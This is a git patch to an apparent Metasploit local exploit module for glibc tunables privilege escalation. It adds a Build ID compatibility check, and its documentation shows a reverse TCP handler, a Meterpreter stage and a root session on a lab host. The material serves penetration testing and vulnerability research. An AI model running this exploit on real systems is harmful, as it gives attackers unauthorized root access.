From 4e61596e7aff309bf20bbc8ee69f2c2ceda10037 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Tue, 19 Dec 2023 12:15:35 -0500 Subject: [PATCH] Check Build ID before running exploit --- .../linux/local/glibc_tunables_priv_esc.md | 8 ++-- .../linux/local/glibc_tunables_priv_esc.rb | 46 +++++++++++++++++++ 2 files changed, 49 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md index be3eca3376..a4abc5b49c 100644 --- a/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md @@ -97,14 +97,12 @@ View the full module info with the info, or info -d command. [*] Started reverse TCP handler on 192.168.123.1:5555 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable -[*] Writing '/tmp/2Vkty.py' (13770 bytes) ... -[*] Running python3 /tmp/2Vkty.py +[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit. [+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes. [*] Sending stage (3045380 bytes) to 192.168.123.228 -[+] Deleted /tmp/2Vkty.py -[*] Meterpreter session 2 opened (192.168.123.1:5555 -> 192.168.123.228:33522) at 2023-11-15 21:58:37 -0500 +[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500 -meterpreter > getuid +meterpreter >getuid Server username: root meterpreter > sysinfo Computer : 192.168.123.228 diff --git a/modules/exploits/linux/local/glibc_tunables_priv_esc.rb b/modules/exploits/linux/local/glibc_tunables_priv_esc.rb index 010d37c394..85f9e77ee9 100644 --- a/modules/exploits/linux/local/glibc_tunables_priv_esc.rb +++ b/modules/exploits/linux/local/glibc_tunables_priv_esc.rb @@ -18,6 +18,15 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck + BUILD_IDS =["69c048078b6c51fa8744f3d7cff3b0d9369ffd53", + "3602eac894717d56555552c84fc6b0e4d6a4af72", + "a99db3715218b641780b04323e4ae5953d68a927", + "a8daca28288575ffc8c7641d40901b0148958fb1", + "61ef896a699bb1c2e4e231642b2e1688b2f1a61e", + "9a9c6aeba5df4178de168e26fe30ddcdab47d374", + "e7b1e0ff3d359623538f4ae0ac69b3e8db26b674", + "956d98a11b839e3392fa1b367b1e3fdfc3e662f6"] + def initialize(info = {}) super( update_info( @@ -110,9 +119,46 @@ class MetasploitModule < Msf::Exploit::Local CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable") end + + def check_ld_so_build_id + # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so + if command_exists?('file ') + file_cmd_output = '' + + # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not + # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default. + sysinfo = get_sysinfo + case sysinfo[:distro] + when 'ubuntu' + if command_exists?('ldconfig') && command_exists?('grep') + (file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')) + end + when 'debian' + if command_exists?('which') && command_exists?('readlink') && + (file_cmd_output = cmd_exec('file "$(readlink -f "$(which ld.so)")"')) + end + end + + if file_cmd_output =~ /BuildID\[.+\]=(\w+),/ + build_id = Regexp.last_match(1) + if BUILD_IDS.include?(build_id) + print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.") + else + fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.") + end + else + print_warning("Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.") + end + else + print_warning("Unable to locate the commands the target in order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.") + end + end + def exploit fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root? + check_ld_so_build_id + python_binary = find_exec_program fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary vprint_status("Using '#{python_binary}' to run the exploit")